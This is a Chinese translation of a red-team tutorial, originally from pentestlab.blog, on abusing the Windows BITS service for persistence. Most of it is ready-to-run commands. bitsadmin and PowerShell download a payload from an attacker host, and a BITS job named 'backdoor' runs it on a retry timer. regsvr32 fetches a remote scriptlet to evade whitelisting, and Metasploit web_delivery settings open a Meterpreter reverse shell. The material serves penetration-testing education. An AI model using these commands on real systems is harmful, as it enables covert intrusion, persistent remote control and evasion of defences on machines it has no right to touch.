Windows操作系統包含各種實用程序,系統管理員可以使用它們來執行各種任務。這些實用程序之一是后台智能傳輸服務(BITS),它可以促進文件到Web服務器(HTTP)和共享文件夾(SMB)的傳輸能力。Microsoft提供了一個名為“ bitsadmin ” 的二進制文件和PowerShell cmdlet,用於創建和管理文件傳輸。
從攻擊的角度來看,可以濫用此功能,以便在受感染的主機上下載有效負載(可執行文件,PowerShell腳本,Scriptlet等)並在給定時間執行這些文件,以在紅隊操作中保持持久性。但是,與“ bitsadmin ” 進行交互需要管理員級別的權限。執行以下命令會將惡意有效負載從遠程位置下載到本地目錄。
bitsadmin /transfer backdoor /download /priority high http://10.0.2.21/pentestlab.exe C:\tmp\pentestlab.exe
Bitsadmin –文件傳輸
還有一個PowerShell cmdlet可以執行相同的任務。
Start-BitsTransfer -Source "http://10.0.2.21/pentestlab.exe" -Destination "C:\tmp\pentestlab.exe"
BitsTrasfer –傳輸文件PowerShell
將文件放入磁盤后,可以通過從“ bitsadmin ”實用程序執行以下命令來實現持久性。用法非常簡單:
- 在創建參數需要作業的名稱
- 該addfile需要文件的遠程位置和本地路徑
- 該SetNotifyCmdLine將執行的命令
- 所述SetMinRetryDelay定義時間回調(秒)
- 該簡歷參數將運行位工作。
bitsadmin /create backdoor
bitsadmin /addfile backdoor "http://10.0.2.21/pentestlab.exe" "C:\tmp\pentestlab.exe"
bitsadmin /SetNotifyCmdLine backdoor C:\tmp\pentestlab.exe NUL
bitsadmin /SetMinRetryDelay "backdoor" 60
bitsadmin /resume backdoor
持久性—BITS Jobs
當作業在系統上運行時,有效負載將被執行,Meterpreter會話將打開,或者通信將被接收回命令和控制(取決於場合中使用的C2)。
持久性– BITS Jobs Meterpreter
參數SetNotifyCmdLine也可以用於通過regsvr32實用程序從遠程位置執行scriptlet 。這種方法的好處是它不會接觸磁盤,並且可以避開將應用程序列入白名單的產品。
bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.0.2.21:8080/FHXSd9.sct scrobj.dll"
bitsadmin /resume backdoor
BITS Jobs – Regsvr32
Metasploit框架可用於通過Web交付模塊捕獲有效負載。
use exploit/multi/script/web_delivery
set target 3
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.2.21
exploit
BITS Jobs – Regsvr32
譯文聲明:本文由Bypass整理並翻譯,僅用於安全研究和學習之用。
原文地址:https://pentestlab.blog/2019/10/30/persistence-bits-jobs/
